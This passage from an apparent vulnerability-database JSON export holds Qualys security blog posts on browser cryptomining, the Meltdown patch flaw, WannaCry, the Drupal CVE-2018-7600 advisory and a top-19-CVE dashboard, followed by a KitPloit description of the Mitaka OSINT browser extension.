vulnerability to compromise victims and inject coin mining scripts. Once a user visits these compromised sites, their system unwittingly contributes towards solving a crypto puzzle that benefits attackers.\n\nTo protect users from their computing resources being drained via unauthorized coin mining scripts running on your machine, one needs to block access to the following popular coin mining services:\n\n * coinhive[.]com\n * load[.]jsecoin[.]com\n * crypto-loot[.]com\n * coin-have[.]com\n * ppoi[.]org\n * cryptoloot[.]pro\n * papoto[.]com\n * coinlab[.]biz\n\n### Qualys BrowserCheck CoinBlocker Extension for Google Chrome\n\nBased on extensive research from Qualys Malware Research Labs, we are announcing [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>), a new Google Chrome browser extension to protect users from browser-based coin mining attacks.\n\nHere are a few screenshots of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) in action:\n\n \n\n\n\n_Fig. 2 Qualys BrowserCheck CoinBlocker_\n\n \n\n\n\n_Fig. 3 Qualys BrowserCheck CoinBlocker Detection Logs_\n\n \n\nQualys BrowserCheck CoinBlocker Extension relies not only on the domain blacklist but also uses heuristics to identify underlying cryptomining algorithms like CryptoNight (used for mining Monero) and its various artifacts.\n\n### Detecting Traditional Cryptomining Threats\n\nAdditionally, cryptomining is not just limited to browser-based scripts as we have seen certain attackers infect systems with a persistent malware that runs outside of a browser to perform cryptomining. To help detect such malware, security professionals can use [Qualys Indication of Compromise](<https://www.qualys.com/apps/indication-of-compromise/>) (IOC) solution to gain 2-second visibility into coin mining and other malware across their entire organization. Qualys IOC includes behaviour-based malware family detection for the following coin mining threats:\n\n * CryptoMinerA\n * CryptoMinerB\n * CryptoMinerC\n * CryptoMinerD\n * CryptoMinerE\n * Neksminer\n\nCryptomining is a rising online threat that is expected to grow as digital currencies and blockchain technologies are getting wider acceptance. Attacker are employing various techniques to use unsuspecting users' systems for malicious purposes. We advise our users to regularly scan systems for vulnerabilities using tools like [Qualys BrowserCheck](<https://browsercheck.qualys.com/>). Stay protected online from crypto-mining attacks with [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension.", "cvss3": {}, "published": "2018-07-25T17:00:02", "type": "qualysblog", "title": "Staying Safe in the Era of Browser-based Cryptocurrency Mining", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-07-25T17:00:02", "id": "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "href": "https://blog.qualys.com/technology/2018/07/25/staying-safe-in-the-era-of-browser-based-cryptocurrency-mining", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). Detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019[ Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&amp;A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### \n\n \n\n\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal [warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. \n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "cvss3": {}, "published": "2018-04-02T18:02:51", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "modified": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-19T15:27:47", "description": "[](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract &amp; refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n**Examples:** \n \n\n\n[](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io &amp; [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io &amp; VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissons** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)\n * `Display notifications`: \n * This extension makes a notification when something goes wrong.\nI don't (and will never) collect any information from the users. \n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" 